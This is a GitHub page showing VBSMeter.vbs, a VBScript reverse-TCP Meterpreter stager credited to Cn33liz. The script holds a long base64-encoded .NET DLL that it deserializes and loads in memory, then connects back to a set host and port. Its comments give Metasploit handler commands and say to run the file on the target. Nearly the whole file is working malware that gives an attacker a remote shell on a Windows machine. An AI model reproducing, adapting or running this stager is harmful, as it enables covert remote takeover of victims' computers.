forked from Cn33liz/VBSMeter
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVBSMeter.vbs
218 lines (207 loc) · 14.8 KB
/
VBSMeter.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
'____ ______________ _________ _____ __
'\ \ / /\______ \/ _____/ / \ _____/ |_ ___________
' \ Y / | | _/\_____ \ / \ / \_/ __ \ __\/ __ \_ __ \
' \ / | | \/ \/ Y \ ___/| | \ ___/| | \/
' \___/ |______ /_______ /\____|__ /\___ >__| \___ >__|
' \/ \/ \/ \/ \/
'VBScript Reversed TCP Meterpreter Stager - by Cn33liz 2017
'CSharp Meterpreter Stager build by Cn33liz and embedded within VBScript using DotNetToJScript from James Forshaw
'https://github.com/tyranid/DotNetToJScript
'This Stager should run on x86 as well as x64
'Usage:
'Change RHOST and RPORT below to suit your needs:
Dim RHOST: RHOST = "172.16.97.1"
Dim RPORT: RPORT = "443"
'Start Msfconsole:
'use exploit/multi/handler
'set PAYLOAD windows/x64/meterpreter/reverse_tcp <- When run from x64 version of wscript.exe
'set PAYLOAD windows/meterpreter/reverse_tcp <- When run from x86 version of wscript.exe
'set LHOST 0.0.0.0
'set LPORT 443
'set AutoRunScript post/windows/manage/migrate NAME=notepad.exe
'set EnableUnicodeEncoding true
'set EnableStageEncoding true
'set ExitOnSession false
'exploit -j
'Then run: wscript.exe VBSMeter.vbs on Target
Sub Debug(s)
End Sub
Sub SetVersion
End Sub
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
Set ms = CreateObject("System.IO.MemoryStream")
ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
ms.Position = 0
Set Base64ToStream = ms
End Function
Sub Run
Dim s, entry_class
s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"
s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"
s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"
s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"
s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"
s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"
s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"
s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"
s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"
s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"
s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"
s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"
s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"
s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"
s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"
s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"
s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"
s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABwAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"
s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMALPkZWQAAAAAA"
s = s & "AAAA4AAiIAsBMAAAFAAAAAYAAAAAAABmMwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"
s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAFDMA"
s = s & "AE8AAAAAQAAA2AMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAANwxAAAcAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"
s = s & "AAAALnRleHQAAABsEwAAACAAAAAUAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA2AMAAABA"
s = s & "AAAABAAAABYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAaAAAAAAAAAAAA"
s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAEgzAAAAAAAASAAAAAIABQDYIgAABA8AAAEAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzAHAHECAAAB"
s = s & "AAARFgogABAAAAsgACAAAAwfQA1+EAAACiZ+EAAAChMEFhMFfgEAAAQtORIR/hUDAAACIAICAAAS"
s = s & "ESgBAAAGLAIWKtAaAAABKBEAAApyAQAAcB8kbxIAAAqAAgAABBeAAQAABAMSBigTAAAKLQIWKgQW"
s = s & "MggEIP//AAAxAhYqEQYEcxQAAAoTBxEHbxUAAAoTCBgXHH4QAAAKFhYoAwAABhMJEQkVcxYAAAoo"
s = s & "FwAACiwCFiofQBgRB28YAAAKbxkAAAoRB28aAAAKcxsAAAooHAAACn4CAAAEEQhvHQAACnQBAAAb"
s = s & "EwoRCREKEQhvHgAACn4QAAAKfhAAAAp+EAAACn4QAAAKKAQAAAYW/gETCxELLRARCSgGAAAGJigC"
s = s & "AAAGJhYqHigfAAAKEwwRDB4oBwAABhEJEQwaFigFAAAGJhEMKCAAAAooIQAACgoRDCgiAAAKGxMN"
s = s & "KCMAAAoeMwQfChMNBhENWI0mAAABEw4oIwAACh4zEREOFh9InBEOFyC/AAAAnCsJEQ4WIL8AAACc"
s = s & "FxMSEQkoIQAACigkAAAKExMoIwAACh4zAxgTEhYTFysTEQ4RFxESWBETEReRnBEXF1gTFxEXGjLo"
s = s & "BigfAAAKExQRFAYoBwAABhYTFRYTFis8EQkRFAYRFVkWKAUAAAYTFhYTGCsaEQ4RGBENWBEVWBEU"
s = s & "ERgoJQAACpwRGBdYExgRGBEWMuARFREWWBMVERUGMr8RFCgiAAAKBwhgEw9+EAAAChEOjmkRDwko"
s = s & "CAAABhMQEQ4WERARDo5pKCYAAAoWFhEQEQQWEgUoCQAABhUoCgAABiYRCSgGAAAGJigCAAAGJhEL"
s = s & "Kh4CKCcAAAoqAAAAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAJAUAACN+AACQ"
s = s & "BQAA2AYAACNTdHJpbmdzAAAAAGgMAAAUAAAAI1VTAHwMAAAQAAAAI0dVSUQAAACMDAAAeAIAACNC"
s = s & "bG9iAAAAAAAAAAIAAAFXdQIcCQIAAAD6ATMAFgAAAQAAACcAAAADAAAACQAAAAwAAAAkAAAAJwAA"
s = s & "AA8AAAACAAAAAQAAAAEAAAAEAAAAAQAAAAoAAAABAAAAAgAAAAEAAAAAAGcDAQAAAAAABgArAt4E"
s = s & "BgCYAt4EBgBcAZ0EDwD+BAAABgCEAdYDBgAOAtYDBgDvAdYDBgB/AtYDBgBLAtYDBgBkAtYDBgCb"
s = s & "AdYDBgBwAb8EBgA0Ab8EBgC2AdYDBgDHA2QFBgDTAWQFBgBCAccGBgAUBoEDBgD/A9YDCgCMBtkF"
s = s & "CgAHAdkFCgDcANkFCgBGBdkFCgCOBTsGCgBoBjsGCgCuBTsGBgDSAIEDBgCWBIEDBgAmAYEDBgCZ"
s = s & "AIEDBgApBdYDCgBqBjsGCgCqAzsGCgCABTsGCgAdATsGBgCVA8cGBgA8A78EBgC6AoEDBgB/BIED"
s = s & "AAAAAAoAAAAAAAEAAQABABAAcwQAAEkAAQABAAoBEAA1AAAAbQADAA0AEQB9AG4BEQBEBHEBBgD2"
s = s & "A3UBBgCIA3UBBhDoA3gBBhD4BXgBBgDsBXUBBgAAA3UBBgAWBEMAAAAAAIAAkyA5BHsBAQAAAAAA"
s = s & "gACWICgEpAADAAAAAACAAJMgRgaDAQMAAAAAAIAAkyAbBpABCQAAAAAAgACRIIcGnAEQAAAAAACA"
s = s & "AJYgUAaaABQAAAAAAIAAkSCtBqUBFQAAAAAAgACRIEYAqwEXAAAAAACAAJEgXgCzARsAAAAAAIAA"
s = s & "kSAHBr4BIQBQIAAAAACGACYGxAEjAM0iAAAAAIYYjAQGACUAAQABAGsAAgACADMAAQABAJoGAQAC"
s = s & "ABIBAQADAOkAAQAEAAkEAQAFADMEAQAGAF4FAQABAMUAAQACALwFAQADAN0CAQAEAE0EAQAFAFYE"
s = s & "AQAGAC4AAQAHACkAAQABAMUAAQACAGAEAQADAHMGAQAEAFIFAQABAMUAAAABALsDAAACABwDAAAB"
s = s & "AKQFAAACAO8CAAADAPYAAAAEADEGAAABAA0FAAACANECAAADAMoFAAAEAGcEAAAFADYFAAAGAFMA"
s = s & "AQABAKsAAQACALAEAAABABMDAAACAIIGCQCMBAEAEQCMBAYAGQCMBAoAKQCMBBAAMQCMBBAAOQCM"
s = s & "BBAAQQCMBBAASQCMBBAAUQCMBBAAWQCMBBAAYQCMBBUAaQCMBBAAcQCMBBAAgQCMBBoAiQCMBAYA"
s = s & "4QAjBEMA6QCzAEYA6QCJAE0AwQArAVUAyQCMBF0AAQH2AmQA4QCMBAEA4QC7BmkAyQCYBW8AkQAK"
s = s & "A3QAyQB5BngACQGMBHwAIQGSAAYAmQC/AogA0QDIAngAKQEjA5AAKQGSBJUA4QBcBpoAKQEwA58A"
s = s & "4QDIAqQAOQEgBagAKQG2Aq4AKQGoBrQAkQCMBAYAJwB7AHECLgALAMoBLgATANMBLgAbAPIBLgAj"
s = s & "APsBLgArABYCLgAzABYCLgA7ABYCLgBDAPsBLgBLABwCLgBTABYCLgBbABYCLgBjADQCLgBrAF4C"
s = s & "QwBbAGsCCgBmAQwAagEIAAYAxgAgAE8DRANaAwEAjQBiEQMAOQQBAAABBQAoBAIARAEHAEYGAQBA"
s = s & "AQkAGwYBAAABCwCHBgEARAENAFAGAQAAAQ8ArQYDAAABEQBGAAQAAAETAF4ABAAAARUABwYEAASA"
s = s & "AAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAC9AD0AAAAAAAIAAAAAAAAAAAAAAL0AgQMA"
s = s & "AAAAAwACAAAAAAAAa2VybmVsMzIAPE1vZHVsZT4AQ1NoYXJwLU1ldGVycHJldGVyRExMAGdRT1MA"
s = s & "c1FPUwBscFdTQURhdGEAbXNjb3JsaWIAVmlydHVhbEFsbG9jAGxwVGhyZWFkSWQAQ3JlYXRlVGhy"
s = s & "ZWFkAHdWZXJzaW9uUmVxdWVzdGVkAEluaXRpYWxpemVkAEdldEZpZWxkAERlbWFuZABSdW50aW1l"
s = s & "VHlwZUhhbmRsZQBoSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAHNvY2tldEhhbmRsZQBWYWx1ZVR5"
s = s & "cGUAUHJvdG9jb2xUeXBlAHByb3RvY29sVHlwZQBmbEFsbG9jYXRpb25UeXBlAFNvY2tldFR5cGUA"
s = s & "c29ja2V0VHlwZQBUcmFuc3BvcnRUeXBlAFRyeVBhcnNlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlh"
s = s & "YmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUA"
s = s & "QXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJs"
s = s & "eUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJs"
s = s & "eUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21w"
s = s & "aWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3Nl"
s = s & "bWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNv"
s = s & "bXBhdGliaWxpdHlBdHRyaWJ1dGUAUmVhZEJ5dGUAR2V0VmFsdWUAZ2V0X1NpemUAZHdTdGFja1Np"
s = s & "emUAc29ja2V0QWRkcmVzc1NpemUAZHdTaXplAFNlcmlhbGl6ZQBpTWF4VWRwRGcAVG9TdHJpbmcA"
s = s & "aXBTdHJpbmcAbGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAFdzMl8zMi5k"
s = s & "bGwAd3MyXzMyLmRsbABrZXJuZWwzMi5kbGwAQ1NoYXJwLU1ldGVycHJldGVyRExMLmRsbABTeXN0"
s = s & "ZW0Ad0hpZ2hWZXJzaW9uAENvZGVBY2Nlc3NQZXJtaXNzaW9uAFNvY2tldFBlcm1pc3Npb24ARGVz"
s = s & "dGluYXRpb24AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24Ac3pEZXNjcmlwdGlvbgB3"
s = s & "VmVzdGlvbgBGaWVsZEluZm8AcHJvdG9jb2xJbmZvAGxwVmVuZG9ySW5mbwBaZXJvAFdTQUNsZWFu"
s = s & "dXAAZ3JvdXAAV1NBU3RhcnR1cABtX0J1ZmZlcgBpbkJ1ZmZlcgBvdXRCdWZmZXIAYnVmZmVyAGxw"
s = s & "UGFyYW1ldGVyAE1ldGVyUHJldGVyAEJpdENvbnZlcnRlcgAuY3RvcgBSZWFkSW50UHRyAFN5c3Rl"
s = s & "bS5EaWFnbm9zdGljcwBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vydmlj"
s = s & "ZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVh"
s = s & "ZEF0dHJpYnV0ZXMAR2V0Qnl0ZXMAQmluZGluZ0ZsYWdzAGR3Q3JlYXRpb25GbGFncwBTb2NrZXRG"
s = s & "bGFncwBzb2NrZXRGbGFncwBmbGFncwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMATmV0d29y"
s = s & "a0FjY2VzcwBJUEFkZHJlc3MAZ2V0X0FkZHJlc3MAbHBBZGRyZXNzAFNvY2tldEFkZHJlc3MAc29j"
s = s & "a2V0QWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBTeXN0ZW0uTmV0LlNvY2tldHMAaU1heFNvY2tldHMA"
s = s & "c3pTeXN0ZW1TdGF0dXMAV2FpdEZvclNpbmdsZU9iamVjdABXU0FDb25uZWN0AE1TRkNvbm5lY3QA"
s = s & "ZmxQcm90ZWN0AFN5c3RlbS5OZXQAV1NBU29ja2V0AGNsb3Nlc29ja2V0AG9wX0V4cGxpY2l0AElQ"
s = s & "RW5kUG9pbnQAY291bnQAZ2V0X1BvcnQAcG9ydAByZWN2AEFkZHJlc3NGYW1pbHkAYWRkcmVzc0Zh"
s = s & "bWlseQBDb3B5AFJ0bFplcm9NZW1vcnkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAEW0A"
s = s & "XwBCAHUAZgBmAGUAcgAAAEPlv29I8QFPll9B+cvVDnIABCABAQgDIAABBSABARERBCABAQ4EIAEB"
s = s & "AgUgAQERPSIHGQgJCQkYCRJhEmUSaRgdBQIYCB0FCRgRDAgdBRgICAgIAgYYBgABEnUReQcgAhJN"
s = s & "DhF9BwACAg4QEmEGIAIBEmEIBCAAEmkFAAICGBgEIAASYQMgAA4DIAAICyAEARGAiRGAjQ4IBCAB"
s = s & "HBwCHQUEAAEYCAQAARgYBAABCBgEAAEBGAMAAAgFAAEdBQgFAAIFGAgIAAQBHQUIGAgIt3pcVhk0"
s = s & "4ImAni4BgIRTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMuU2VjdXJpdHlQZXJtaXNzaW9uQXR0"
s = s & "cmlidXRlLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Ymxp"
s = s & "Y0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkVAVQCEFNraXBWZXJpZmljYXRpb24BAxeBAQMXgIEC"
s = s & "BgIDBhJNAgYGAgYOBwACCAYQEQwMAAYYEVERVRFZGAkICwAHCBgdBQgYGBgYCAAECBgYCBFdBQAC"
s = s & "ARgIBwAEGBgJCQkKAAYYCQkYGAkQCQUAAgkYCQUgAgIOCAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5v"
s = s & "bkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAaAQAVQ1NoYXJwLU1ldGVycHJldGVyRExMAAAFAQAA"
s = s & "AAAXAQASQ29weXJpZ2h0IMKpICAyMDE3AAApAQAkMDY2NjljNmUtYmJmMy00NmFiLThjNmUtNDM2"
s = s & "MmQwYmFiZTRhAAAMAQAHMS4wLjAuMAAABQEAAQAABAEAAAAAAAAAAAAs+RlZAAAAAAIAAAAcAQAA"
s = s & "+DEAAPgTAABSU0RTNsEXk8ZvY0GKVEsGxKoSfAEAAABDOlxEZXZlbG9wbWVudFxDU2hhcnAtTWV0"
s = s & "ZXJwcmV0ZXJETExcQ1NoYXJwLU1ldGVycHJldGVyRExMXG9ialxSZWxlYXNlXENTaGFycC1NZXRl"
s = s & "cnByZXRlckRMTC5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAADwzAAAAAAAAAAAAAFYzAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIMwAAAAAAAAAA"
s = s & "AAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEA"
s = s & "AAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAHwDAAAAAAAAAAAAAHwDNAAAAFYAUwBf"
s = s & "AFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAA"
s = s & "AAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAk"
s = s & "AAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsATcAgAAAQBTAHQAcgBpAG4AZwBGAGkA"
s = s & "bABlAEkAbgBmAG8AAAC4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0"
s = s & "AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAVAAWAAEARgBpAGwA"
s = s & "ZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAUwBoAGEAcgBwAC0ATQBlAHQAZQByAHAAcgBl"
s = s & "AHQAZQByAEQATABMAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAA"
s = s & "LgAwAAAAVAAaAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAFMAaABhAHIAcAAtAE0AZQB0"
s = s & "AGUAcgBwAHIAZQB0AGUAcgBEAEwATAAuAGQAbABsAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkA"
s = s & "cgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMQA3AAAAKgABAAEATABl"
s = s & "AGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABcABoAAQBPAHIAaQBnAGkAbgBhAGwA"
s = s & "RgBpAGwAZQBuAGEAbQBlAAAAQwBTAGgAYQByAHAALQBNAGUAdABlAHIAcAByAGUAdABlAHIARABM"
s = s & "AEwALgBkAGwAbAAAAEwAFgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBTAGgAYQByAHAA"
s = s & "LQBNAGUAdABlAHIAcAByAGUAdABlAHIARABMAEwAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQBy"
s = s & "AHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIA"
s = s & "cwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAwAAAMAAAAaDMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rp"
s = s & "b24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL"
entry_class = "MeterPreter"
Dim fmt, al, d, o
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
al.Add fmt.SurrogateSelector
Set d = fmt.Deserialize_2(Base64ToStream(s))
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.MSFConnect RHOST, RPORT
End Sub
SetVersion
On Error Resume Next
Run
If Err.Number <> 0 Then
Debug Err.Description
Err.Clear
End If